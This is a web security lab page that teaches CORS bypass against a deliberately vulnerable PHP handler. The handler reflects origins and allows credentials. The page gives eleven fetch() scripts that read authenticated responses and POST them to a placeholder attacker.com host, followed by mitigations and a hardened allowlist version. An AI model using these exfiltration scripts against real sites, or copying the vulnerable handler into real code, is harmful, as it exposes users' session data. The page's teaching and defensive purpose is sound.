Lab 4: Advanced CORS Bypass

Advanced CORS bypass techniques against sophisticated filters

Difficulty: High

Lab Overview

This lab demonstrates advanced CORS bypass techniques that can be used to circumvent sophisticated CORS protections. These techniques include subdomain bypass, port bypass, protocol bypass, and various encoding techniques.

Objective: Use advanced techniques to bypass CORS protections and access sensitive data.

Vulnerable CORS Headers

// Vulnerable: reflects any Origin that survives a weak substring blocklist
function set_cors_headers() {
    $origin = $_SERVER['HTTP_ORIGIN'] ?? '*';

    // Vulnerable: case-sensitive substring blocklist of three domains;
    // every origin that does not contain one of these strings is trusted
    if (strpos($origin, 'evil.com') !== false || 
        strpos($origin, 'attacker.com') !== false ||
        strpos($origin, 'malicious.com') !== false) {
        // Block known malicious domains
        header("HTTP/1.1 403 Forbidden");
        exit();
    }

    // Vulnerable: echoes the request Origin back and allows credentials,
    // so any origin that passed the blocklist can read authenticated responses
    header("Access-Control-Allow-Origin: $origin");
    header("Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS, PATCH, HEAD");
    header("Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With, X-Custom-Header, X-Forwarded-For, X-Real-IP");
    header("Access-Control-Allow-Credentials: true");
    // Vulnerable: exposes sensitive response headers to the cross-origin caller
    header("Access-Control-Expose-Headers: X-Sensitive-Data, X-API-Key, X-User-Info, X-Admin-Key, X-Session-Token");
    header("Access-Control-Max-Age: 86400");

    // Handle preflight requests
    if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
        http_response_code(200);
        exit();
    }
}
Advanced CORS Bypass Tester
⚠️ Advanced Bypass Warning

This lab demonstrates advanced CORS bypass techniques:

  • Subdomain Bypass - evil.example.com
  • Port Bypass - evil.com:8080
  • Protocol Bypass - https://evil.com
  • Encoding Bypass - Unicode, null bytes
Bypass API Endpoints

Try these bypass endpoints:

  • ?action=bypass_test - General bypass test
  • ?action=subdomain_bypass - Subdomain bypass
  • ?action=port_bypass - Port bypass
  • ?action=protocol_bypass - Protocol bypass
Vulnerability Details
  • Type: Advanced CORS Bypass
  • Severity: Critical
  • Method: GET/POST
  • Issue: Advanced bypass techniques
Bypass Techniques
  • Subdomain Bypass: evil.example.com
  • Port Bypass: evil.com:8080
  • Protocol Bypass: https://evil.com
  • Encoding Bypass: Unicode, null bytes
Advanced CORS Bypass Examples

Use these techniques to bypass CORS protections:

1. Subdomain Bypass:

// Subdomain bypass technique
fetch('http://vulnerable-site.com/api?action=subdomain_bypass', {
    method: 'GET',
    credentials: 'include',
    mode: 'cors',
    headers: {
        'Content-Type': 'application/json',
        'Origin': 'https://evil.example.com',
        'X-Custom-Header': 'malicious-value'
    }
})
.then(response => response.json())
.then(data => {
    console.log('Subdomain bypass successful:', data);
    // Send to attacker server
    fetch('http://attacker.com/steal-subdomain', {
        method: 'POST',
        body: JSON.stringify(data)
    });
});

2. Port Bypass:

// Port bypass technique
fetch('http://vulnerable-site.com/api?action=port_bypass', {
    method: 'GET',
    credentials: 'include',
    mode: 'cors',
    headers: {
        'Content-Type': 'application/json',
        'Origin': 'https://evil.com:8080',
        'X-Custom-Header': 'malicious-value'
    }
})
.then(response => response.json())
.then(data => {
    console.log('Port bypass successful:', data);
    // Send to attacker server
    fetch('http://attacker.com/steal-port', {
        method: 'POST',
        body: JSON.stringify(data)
    });
});

3. Protocol Bypass:

// Protocol bypass technique
fetch('http://vulnerable-site.com/api?action=protocol_bypass', {
    method: 'GET',
    credentials: 'include',
    mode: 'cors',
    headers: {
        'Content-Type': 'application/json',
        'Origin': 'https://evil.com',
        'X-Custom-Header': 'malicious-value'
    }
})
.then(response => response.json())
.then(data => {
    console.log('Protocol bypass successful:', data);
    // Send to attacker server
    fetch('http://attacker.com/steal-protocol', {
        method: 'POST',
        body: JSON.stringify(data)
    });
});

4. Unicode Bypass:

// Unicode bypass technique
fetch('http://vulnerable-site.com/api?action=bypass_test', {
    method: 'GET',
    credentials: 'include',
    mode: 'cors',
    headers: {
        'Content-Type': 'application/json',
        'Origin': 'https://evil.com\u0000',
        'X-Custom-Header': 'malicious-value'
    }
})
.then(response => response.json())
.then(data => {
    console.log('Unicode bypass successful:', data);
    // Send to attacker server
    fetch('http://attacker.com/steal-unicode', {
        method: 'POST',
        body: JSON.stringify(data)
    });
});

5. Null Byte Bypass:

// Null byte bypass technique
fetch('http://vulnerable-site.com/api?action=bypass_test', {
    method: 'GET',
    credentials: 'include',
    mode: 'cors',
    headers: {
        'Content-Type': 'application/json',
        'Origin': 'https://evil.com%00',
        'X-Custom-Header': 'malicious-value'
    }
})
.then(response => response.json())
.then(data => {
    console.log('Null byte bypass successful:', data);
    // Send to attacker server
    fetch('http://attacker.com/steal-null', {
        method: 'POST',
        body: JSON.stringify(data)
    });
});

6. Case Bypass:

// Case bypass technique
fetch('http://vulnerable-site.com/api?action=bypass_test', {
    method: 'GET',
    credentials: 'include',
    mode: 'cors',
    headers: {
        'Content-Type': 'application/json',
        'Origin': 'https://EVIL.COM',
        'X-Custom-Header': 'malicious-value'
    }
})
.then(response => response.json())
.then(data => {
    console.log('Case bypass successful:', data);
    // Send to attacker server
    fetch('http://attacker.com/steal-case', {
        method: 'POST',
        body: JSON.stringify(data)
    });
});

7. Mixed Case Bypass:

// Mixed case bypass technique
fetch('http://vulnerable-site.com/api?action=bypass_test', {
    method: 'GET',
    credentials: 'include',
    mode: 'cors',
    headers: {
        'Content-Type': 'application/json',
        'Origin': 'https://EvIl.CoM',
        'X-Custom-Header': 'malicious-value'
    }
})
.then(response => response.json())
.then(data => {
    console.log('Mixed case bypass successful:', data);
    // Send to attacker server
    fetch('http://attacker.com/steal-mixed', {
        method: 'POST',
        body: JSON.stringify(data)
    });
});

8. Path Bypass:

// Path bypass technique
fetch('http://vulnerable-site.com/api?action=bypass_test', {
    method: 'GET',
    credentials: 'include',
    mode: 'cors',
    headers: {
        'Content-Type': 'application/json',
        'Origin': 'https://evil.com/path',
        'X-Custom-Header': 'malicious-value'
    }
})
.then(response => response.json())
.then(data => {
    console.log('Path bypass successful:', data);
    // Send to attacker server
    fetch('http://attacker.com/steal-path', {
        method: 'POST',
        body: JSON.stringify(data)
    });
});

9. Fragment Bypass:

// Fragment bypass technique
fetch('http://vulnerable-site.com/api?action=bypass_test', {
    method: 'GET',
    credentials: 'include',
    mode: 'cors',
    headers: {
        'Content-Type': 'application/json',
        'Origin': 'https://evil.com#fragment',
        'X-Custom-Header': 'malicious-value'
    }
})
.then(response => response.json())
.then(data => {
    console.log('Fragment bypass successful:', data);
    // Send to attacker server
    fetch('http://attacker.com/steal-fragment', {
        method: 'POST',
        body: JSON.stringify(data)
    });
});

10. Query Bypass:

// Query bypass technique
fetch('http://vulnerable-site.com/api?action=bypass_test', {
    method: 'GET',
    credentials: 'include',
    mode: 'cors',
    headers: {
        'Content-Type': 'application/json',
        'Origin': 'https://evil.com?query=value',
        'X-Custom-Header': 'malicious-value'
    }
})
.then(response => response.json())
.then(data => {
    console.log('Query bypass successful:', data);
    // Send to attacker server
    fetch('http://attacker.com/steal-query', {
        method: 'POST',
        body: JSON.stringify(data)
    });
});

11. Advanced Bypass Combination:

// Advanced bypass combination
async function advancedBypass() {
    const bypassTechniques = [
        'https://evil.example.com',
        'https://evil.com:8080',
        'https://evil.com',
        'https://evil.com\u0000',
        'https://evil.com%00',
        'https://EVIL.COM',
        'https://EvIl.CoM',
        'https://evil.com/path',
        'https://evil.com#fragment',
        'https://evil.com?query=value'
    ];
    for (const technique of bypassTechniques) {
        try {
            const response = await fetch('http://vulnerable-site.com/api?action=bypass_test', {
                method: 'GET',
                credentials: 'include',
                mode: 'cors',
                headers: {
                    'Content-Type': 'application/json',
                    'Origin': technique,
                    'X-Custom-Header': 'malicious-value'
                }
            });
            if (response.ok) {
                const data = await response.json();
                console.log(`Bypass successful with ${technique}:`, data);
                // Send to attacker server
                fetch('http://attacker.com/steal-advanced', {
                    method: 'POST',
                    body: JSON.stringify({
                        technique: technique,
                        data: data,
                        timestamp: new Date().toISOString()
                    })
                });
            }
        } catch (error) {
            console.error(`Bypass failed with ${technique}:`, error);
        }
    }
}
advancedBypass();
Mitigation Strategies
  • Implement strict origin validation
  • Use whitelist-based CORS policies
  • Validate all origin headers properly
  • Implement proper encoding validation
  • Use Content Security Policy (CSP)
  • Regular security testing and vulnerability assessments
  • Monitor for unusual cross-origin requests
  • Implement proper authentication and authorization
  • Use Web Application Firewall (WAF)
  • Implement rate limiting and request validation
  • Audit exposed headers and minimize exposure
  • Use secure session management
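The following is an added example, not part of the lab and not the lab's own code: a hardened replacement for the set_cors_headers() function shown under "Vulnerable CORS Headers", implementing the first four mitigation items above (strict validation, allowlist, proper origin checking, encoding handling). It assumes an allowlist of two placeholder origins, https://app.example.com and https://admin.example.com, and the function names allowed_origin() and set_cors_headers_hardened() are this example's own. One caveat worth knowing when reading the bypass list: in a real browser, Origin is a forbidden request header, so the 'Origin' values in the fetch() calls above are ignored and the browser sends the page's true origin; the values are still useful as server-side test inputs because curl, proxies and non-browser clients can send anything, and the server must reject all of them regardless of who set them.

```php
<?php
// Hardened CORS handling (added example; not the lab's code).
// The lab's version echoes any Origin that survives a substring blocklist.
// This version emits Access-Control-Allow-Origin only on an exact allowlist match.

// Assumed allowlist (placeholders). Each entry is the full origin exactly as a
// browser serializes it: lowercase scheme and host, explicit port only when it
// is not the scheme's default. No wildcards, no substrings, no regex matching.
const CORS_ALLOWED_ORIGINS = [
    'https://app.example.com',
    'https://admin.example.com',
];

/**
 * Return the origin to echo back, or null when no CORS headers may be sent.
 * Exact, case-sensitive comparison is what defeats every variant in this lab:
 * evil.example.com, evil.com:8080, http vs https, a NUL or %00 suffix, EVIL.COM,
 * EvIl.CoM and any path/query/fragment suffix are all simply "not in the list".
 */
function allowed_origin(?string $origin): ?string
{
    if ($origin === null || $origin === '') {
        return null; // same-origin or non-browser request: no CORS headers needed
    }

    // A browser-generated Origin is scheme://host[:port] in lowercase ASCII, or the
    // literal string "null" for opaque origins (sandboxed iframes, file://).
    // Anything else (control bytes, percent-encoding, uppercase, a path, query or
    // fragment) is rejected before comparison. "null" never matches because it has
    // no "://" and must never be allowlisted. \z anchors at the true end of the
    // string, so a trailing NUL or newline cannot slip past the check.
    // Assumption: hostname or IPv4 origins; IPv6 literals ([::1]) are not handled.
    if (preg_match('~^[a-z][a-z0-9+.-]*://[a-z0-9.-]+(:[0-9]{1,5})?\z~', $origin) !== 1) {
        return null;
    }

    // Strict (===) comparison against the allowlist; no normalization is attempted,
    // because every normalization step is another place for a bypass to hide.
    return in_array($origin, CORS_ALLOWED_ORIGINS, true) ? $origin : null;
}

function set_cors_headers_hardened(): void
{
    // Always vary on Origin so a shared cache never serves one origin's
    // Access-Control-Allow-Origin value to a different origin.
    header('Vary: Origin');

    $origin = allowed_origin($_SERVER['HTTP_ORIGIN'] ?? null);
    if ($origin === null) {
        // Unknown origin: send no Access-Control-* headers at all. The browser then
        // refuses to expose the response to the calling page. Preflights from
        // unknown origins are answered 403 so the actual request is never made.
        if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
            http_response_code(403);
            exit();
        }
        return;
    }

    header("Access-Control-Allow-Origin: $origin");
    header('Access-Control-Allow-Credentials: true');
    // Least privilege: only the methods and request headers this API actually uses.
    header('Access-Control-Allow-Methods: GET, POST, OPTIONS');
    header('Access-Control-Allow-Headers: Content-Type, Authorization');
    // Deliberately no Access-Control-Expose-Headers: nothing beyond the
    // CORS-safelisted response headers is readable cross-origin. Values such as
    // X-API-Key or X-Session-Token belong in the response body of an
    // authenticated endpoint or in a cookie, never in an exposed header.
    header('Access-Control-Max-Age: 600');

    if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
        http_response_code(204);
        exit();
    }
}

// Usage: call this at the top of the API script in place of set_cors_headers().
set_cors_headers_hardened();
```

Two design points: the response for a rejected origin carries no Access-Control-Allow-Origin header rather than echoing a default, so there is nothing for a permissive client to misread; and Vary: Origin is sent unconditionally, because the lab's original Max-Age of 86400 combined with a shared cache would otherwise let one origin's allow header be replayed to others.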